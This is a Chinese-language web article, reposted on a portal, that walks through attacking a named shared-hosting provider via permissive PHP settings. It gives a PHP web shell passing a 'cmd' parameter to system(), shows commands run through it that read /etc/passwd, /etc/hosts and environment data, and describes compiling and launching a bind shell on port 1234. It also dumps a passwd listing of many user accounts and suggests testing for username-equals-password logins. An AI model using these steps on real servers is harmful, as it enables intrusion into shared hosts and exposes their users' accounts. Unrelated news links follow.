分享
 
 
 

构建Linux下的安全,PHP配置漏洞攻击

王朝php·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

这些站点的问题主要出在允许使用system(),exec()等等这些函数,熟悉php的朋友应该知道,这些函数是调用系统指令的(虽然通过web server php程序只能有nobody权限),而且一般用户只要申请一个空间就可以获取局部的可写权限,令用户可以写一个web shell程序执行命令.在这些服务器上一般用户不能够登陆,也就是nologin(没有登陆shell,管理员可没那么"慷慨"!),这样利用system(),exec()这些函数就可以bind一个shell出来~!本文以虎翼网(www.51.net)的空间为例子(他是不是所有的服务器都有这个毛病我不知道~我只试验了我的空间所在的服务器):

1.写一个webshell先(php很容易做到)

?php

#shell.php3

echo"<pre";

system("$cmd");

echo"

";

?

2.上传到空间

3.执行(具体的服务器马赛克处理)

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (看一下权限到底多大)

uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)

root真的很吝啬啊!

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras(看看系统)

FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20

00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat

/etc/passwd(shadow是铁定看不到)

root:*:0:0:Charlie &:/root:/bin/csh

toor:*:0:0:Bourne-again Superuser:/root:

daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin

operator:*:2:5:System &:/:/sbin/nologin

bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin

tty:*:107353:51:USER:/home/tty:/local/bin/null

kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin

games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

news:*:8:8:News Subsystem:/:/sbin/nologin

man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin

bind:*:53:53:Bind Sandbox:/:/sbin/nologin

uucp:*:66:66:UUCP

pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico

xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin

pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin

ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin

nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin

quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin

quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin

tian:*:1002:1002::/local/tian:/local/bin/ksh

sysadmin:*:1001:1001:System

Administrator:/local/sysadmin:/local/bin/ksh

test2:*:9999:51::/home/test2:/local/bin/null

xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin

zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null

yes2:*:106202:51:USER:/home/yes2:/local/bin/null

daboy:*:106203:51:USER:/home/daboy:/local/bin/null

yesky:*:106204:51:USER:/home/yesky:/local/bin/null

yesk:*:106205:51:USER:/home/yesk:/local/bin/null

lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null

fog:*:106207:51:USER:/home/fog:/local/bin/null

renshou:*:106208:51:USER:/home/renshou:/local/bin/null

hilen:*:106209:51:USER:/home/hilen:/local/bin/null

hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin

xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin

wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null

larry:*:106213:51:USER:/home/larry:/local/bin/null

sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null

everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null

linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null

baobao:*:106217:51:USER:/home/baobao:/local/bin/null

chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null

hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null

dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null

simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null

chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null

lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null

zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null

pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null

startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null

model:*:106227:51:USER:/home/model:/local/bin/null

leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null

fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null

ljok:*:106230:51:USER:/home/ljok:/local/bin/null

baorui:*:106231:51:USER:/home/baorui:/local/bin/null

fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null

zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null

xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null

zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null

power:*:106236:51:USER:/home/power:/local/bin/null

feefan:*:106237:51:USER:/home/feefan:/local/bin/null

paradise:*:106238:51:USER:/home/paradise:/local/bin/null

wulc:*:106239:51:USER:/home/wulc:/local/bin/null

jcm:*:106240:51:USER:/home/jcm:/local/bin/null

liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null

jingder:*:106242:51:USER:/home/jingder:/local/bin/null

hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null

adai:*:106244:51:USER:/home/adai:/local/bin/null

fightben:*:106245:51:USER:/home/fightben:/local/bin/null

lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null

xeno:*:106247:51:USER:/home/xeno:/local/bin/null

..................(太多了~省略)

只有几个用户有shell可以登陆,cp到我的目录下面,等一下分离出usrename看看有没有人username=passwd的~呵呵~

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set

HOME=/

PS1=$

OPTIND=1

PS2=

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin

IFS=

好差的"环境",被设置成这样....

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts

# $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $

#

# Host Database

# This file should contain the addresses and aliases

# for local hosts that share this file.

# In the presence of the domain name service or NIS, this file may

# not be consulted at all; see /etc/host.conf for the resolution

order.

#

#

127.0.0.1 localhost localhost.my.domain myname.my.domain

#

# Imaginary network.

#10.0.0.2 myname.my.domain myname

#10.0.0.3 myfriend.my.domain myfriend

#

# According to RFC 1918, you can use the following IP networks for

# private nets which will never be connected to the Internet:

#

# 10.0.0.0 - 10.255.255.255

# 172.16.0.0 - 172.31.255.255

# 192.168.0.0 - 192.168.255.255

#

#

不算太小啊~hosts ~

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc

(老天保佑~有gcc)

gcc:/usr/sbin/gcc(万岁!!!!!!!!!!!!)

我来试试看~弄一个大家伙上去,编译一下,哈哈~速度好快!

webshell太累了,bind一个shell出来方便一点...(上传binshell程序,自己写也可以用perl/C,都不太难)

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234

bind shell too port 1234

telnet xxx.51.net 1234

.....下面省略,反正就可以执行命令了

嗯~好像这台没装MySQL,可惜~呵呵~~~~~~~~~,对了oso.com.cn的好像有~,不过最近停了.....

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=/usr/sbin/rpcinfo -p

localhost

portmapper 100000 portmap sunrpc

rstatd 100001 rstat rstat_svc rup perfmeter

rusersd 100002 rusers

nfs 100003 nfsprog

ypserv 100004 ypprog

mountd 100005 mount showmount

ypbind 100007

walld 100008 rwall shutdown

yppasswdd 100009 yppasswd

etherstatd 100010 etherstat

rquotad 100011 rquotaprog quota rquota

sprayd 100012 spray

3270_mapper 100013

rje_ma

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有